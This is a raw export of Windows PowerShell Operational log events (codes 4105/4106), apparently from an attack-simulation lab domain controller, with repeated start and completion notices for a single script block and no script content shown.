Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475223
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475222
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475221
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475220
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475219
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475218
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475217
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475216
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475215
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475214
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475212
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475211
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475210
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475209
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475208
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475206
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475205
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475204
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475203
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475202
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475200
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475199
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475198
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475197
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475196
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475195
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475194
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475192
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475191
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475190
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475189
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475188
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475187
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475186
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475185
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475184
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475183
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475182
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475181
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475180
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475178
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475177
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475176
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475174
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475173
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475172
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475171
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475170
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475169
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
